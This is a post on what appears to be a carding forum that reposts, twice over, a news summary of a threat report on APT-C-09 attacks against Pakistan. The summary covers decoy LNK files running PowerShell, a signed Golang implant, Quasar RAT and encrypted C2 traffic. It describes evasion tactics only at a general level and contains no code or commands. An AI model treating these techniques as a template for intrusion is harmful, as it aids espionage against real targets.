Carding Forum
Professional
- Messages
- 2,788
- Reaction score
- 1,198
- Points
- 113
Stealth and encryption help the group to spy on the target systems without being noticed.
According to a report from the 360 Advanced Threat Research Institute, the APT-C-09 group is conducting relentless attacks on Pakistan using new malware.
To carry out attacks, the group uses decoy files disguised in links to documents. One of these files is called "Quran. pdf. lnk" and runs PowerShell scripts when opened. Teams download fake documents and malicious components from remote servers, and create tasks to ensure a long-term presence on the infected system.
The main malicious component is a file "Winver.exe", which is written in Golang. The file has a digital certificate, which makes it difficult for antivirus programs to detect and block it. At startup Winver.exe collects information about the system, user, and other parameters, and then transmits the data to the C2 server via encrypted communication channels.
In addition, attacks were detected using Quasar RAT — another malicious tool that was previously repeatedly used by APT-C-09. The Trojan allows you to execute a wide range of remote commands, including creating screenshots, managing files and processes on the infected system.
New threats and ongoing improvements in methods
This analysis shows that APT-C-09 is actively developing and improving its methods. The Group does not limit itself to old tools, but constantly introduces new technologies to bypass security systems and achieve its goals.
One of the characteristic features of APT-C-09 attacks is the use of Let's Encrypt certificates to encrypt communication with the management server, as well as the use of RC4 and Base64 encryption algorithms, which were also used in previous attacks of the group.
Due to ongoing attacks, it is important to strengthen security measures and exercise caution when working with unknown files and links. Users are advised to avoid opening suspicious attachments and links, and to regularly update their antivirus software and security systems.
Source
According to a report from the 360 Advanced Threat Research Institute, the APT-C-09 group is conducting relentless attacks on Pakistan using new malware.
To carry out attacks, the group uses decoy files disguised in links to documents. One of these files is called "Quran. pdf. lnk" and runs PowerShell scripts when opened. Teams download fake documents and malicious components from remote servers, and create tasks to ensure a long-term presence on the infected system.
The main malicious component is a file "Winver.exe", which is written in Golang. The file has a digital certificate, which makes it difficult for antivirus programs to detect and block it. At startup Winver.exe collects information about the system, user, and other parameters, and then transmits the data to the C2 server via encrypted communication channels.
In addition, attacks were detected using Quasar RAT — another malicious tool that was previously repeatedly used by APT-C-09. The Trojan allows you to execute a wide range of remote commands, including creating screenshots, managing files and processes on the infected system.
New threats and ongoing improvements in methods
This analysis shows that APT-C-09 is actively developing and improving its methods. The Group does not limit itself to old tools, but constantly introduces new technologies to bypass security systems and achieve its goals.
One of the characteristic features of APT-C-09 attacks is the use of Let's Encrypt certificates to encrypt communication with the management server, as well as the use of RC4 and Base64 encryption algorithms, which were also used in previous attacks of the group.
Due to ongoing attacks, it is important to strengthen security measures and exercise caution when working with unknown files and links. Users are advised to avoid opening suspicious attachments and links, and to regularly update their antivirus software and security systems.
Source
